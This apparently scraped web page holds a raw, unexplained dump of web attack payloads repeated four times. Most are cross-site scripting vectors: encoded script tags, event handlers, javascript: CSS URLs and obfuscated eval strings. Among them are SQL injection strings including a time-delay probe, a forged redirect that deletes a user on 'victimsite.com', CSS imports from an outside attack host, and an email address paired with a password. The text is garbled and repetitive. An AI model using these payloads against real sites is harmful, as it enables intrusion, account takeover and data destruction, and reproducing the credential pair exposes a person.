phpinfo.php jagadeeshwarreddy.godala@gmail.com P@ssword1 %0A%22%3E%3Cscript%3Ealert(444)%3C%2Fscript%3E ">alert(888) ">alert(document.domain) alert(‘XSS’) %uff1cscript%uff1ealert(9);%uff1c/script%uff1e '/>alert('111111') ' onmouseover=prompt(929623) bad=' %0A%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%35%34%34%34%29%3C%2F%73%63%72%69%70%74%3E 1prompt("XSS FOUND") 1prompt(968886) '>>alert(XSS) '';!--"=&{()} "onmouseover=prompt(959295)> "%20onmouseover=prompt(908001)%20bad=" Click me Click me “0'; waitfor delay '0:0:25' – admin'or '1' = '1' alert("XSS"); alert("XSS"); \ "><script>alert(444)</script> %22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%32%33%29%3C%2F%73%63%72%69%70%74%3E 223E3C7363726970743E616C65727428343434293C2F7363726970743E alert(String.fromCharCode(88,83,83)) '/ " XSS foo" onmouseover="alert(1) "> '+alert('Hllo')&&null==' ">alert(String.fromCharCode(88,83,83))=&{} '';!--"=&{()} alert('XSS') alert(String.fromCharCode(88,83,83)) Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/* li {list-style-image: url("javascript:alert('XSS')");}XSS %BCscript%BEalert(%A2XSS%A2)%BC/script%BE a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); alert('XSS'); .XSS{background-image:url("javascript:alert('XSS')");} BODY{background:url("javascript:alert('XSS')")} @import'http://ha.ckers.org/xss.css'; BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")} ]]>
phpinfo.php jagadeeshwarreddy.godala@gmail.com P@ssword1 %0A%22%3E%3Cscript%3Ealert(444)%3C%2Fscript%3E ">alert(888) ">alert(document.domain) alert(‘XSS’) %uff1cscript%uff1ealert(9);%uff1c/script%uff1e '/>alert('111111') ' onmouseover=prompt(929623) bad=' %0A%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%35%34%34%34%29%3C%2F%73%63%72%69%70%74%3E 1prompt("XSS FOUND") 1prompt(968886) '>>alert(XSS) '';!--"=&{()} "onmouseover=prompt(959295)> "%20onmouseover=prompt(908001)%20bad=" Click me Click me “0'; waitfor delay '0:0:25' – admin'or '1' = '1' alert("XSS"); alert("XSS"); \ "><script>alert(444)</script> %22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%32%33%29%3C%2F%73%63%72%69%70%74%3E 223E3C7363726970743E616C65727428343434293C2F7363726970743E alert(String.fromCharCode(88,83,83)) '/ " XSS foo" onmouseover="alert(1) "> '+alert('Hllo')&&null==' ">alert(String.fromCharCode(88,83,83))=&{} '';!--"=&{()} alert('XSS') alert(String.fromCharCode(88,83,83)) Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/* li {list-style-image: url("javascript:alert('XSS')");}XSS %BCscript%BEalert(%A2XSS%A2)%BC/script%BE a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); alert('XSS'); .XSS{background-image:url("javascript:alert('XSS')");} BODY{background:url("javascript:alert('XSS')")} @import'http://ha.ckers.org/xss.css'; BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")} ]]>
phpinfo.php jagadeeshwarreddy.godala@gmail.com P@ssword1 %0A%22%3E%3Cscript%3Ealert(444)%3C%2Fscript%3E ">alert(888) ">alert(document.domain) alert(‘XSS’) %uff1cscript%uff1ealert(9);%uff1c/script%uff1e '/>alert('111111') ' onmouseover=prompt(929623) bad=' %0A%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%35%34%34%34%29%3C%2F%73%63%72%69%70%74%3E 1prompt("XSS FOUND") 1prompt(968886) '>>alert(XSS) '';!--"=&{()} "onmouseover=prompt(959295)> "%20onmouseover=prompt(908001)%20bad=" Click me Click me “0'; waitfor delay '0:0:25' – admin'or '1' = '1' alert("XSS"); alert("XSS"); \ "><script>alert(444)</script> %22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%32%33%29%3C%2F%73%63%72%69%70%74%3E 223E3C7363726970743E616C65727428343434293C2F7363726970743E alert(String.fromCharCode(88,83,83)) '/ " XSS foo" onmouseover="alert(1) "> '+alert('Hllo')&&null==' ">alert(String.fromCharCode(88,83,83))=&{} '';!--"=&{()} alert('XSS') alert(String.fromCharCode(88,83,83)) Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/* li {list-style-image: url("javascript:alert('XSS')");}XSS %BCscript%BEalert(%A2XSS%A2)%BC/script%BE a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); alert('XSS'); .XSS{background-image:url("javascript:alert('XSS')");} BODY{background:url("javascript:alert('XSS')")} @import'http://ha.ckers.org/xss.css'; BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")} ]]>
phpinfo.php jagadeeshwarreddy.godala@gmail.com P@ssword1 %0A%22%3E%3Cscript%3Ealert(444)%3C%2Fscript%3E ">alert(888) ">alert(document.domain) alert(‘XSS’) %uff1cscript%uff1ealert(9);%uff1c/script%uff1e '/>alert('111111') ' onmouseover=prompt(929623) bad=' %0A%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%35%34%34%34%29%3C%2F%73%63%72%69%70%74%3E 1prompt("XSS FOUND") 1prompt(968886) '>>alert(XSS) '';!--"=&{()} "onmouseover=prompt(959295)> "%20onmouseover=prompt(908001)%20bad=" Click me Click me “0'; waitfor delay '0:0:25' – admin'or '1' = '1' alert("XSS"); alert("XSS"); \ "><script>alert(444)</script> %22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%32%33%29%3C%2F%73%63%72%69%70%74%3E 223E3C7363726970743E616C65727428343434293C2F7363726970743E alert(String.fromCharCode(88,83,83)) '/ " XSS foo" onmouseover="alert(1) "> '+alert('Hllo')&&null==' ">alert(String.fromCharCode(88,83,83))=&{} '';!--"=&{()} alert('XSS') alert(String.fromCharCode(88,83,83)) Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/* li {list-style-image: url("javascript:alert('XSS')");}XSS %BCscript%BEalert(%A2XSS%A2)%BC/script%BE a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); alert('XSS'); .XSS{background-image:url("javascript:alert('XSS')");} BODY{background:url("javascript:alert('XSS')")} @import'http://ha.ckers.org/xss.css'; BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")} ]]>
You must login to ReleaseWire to request a connection.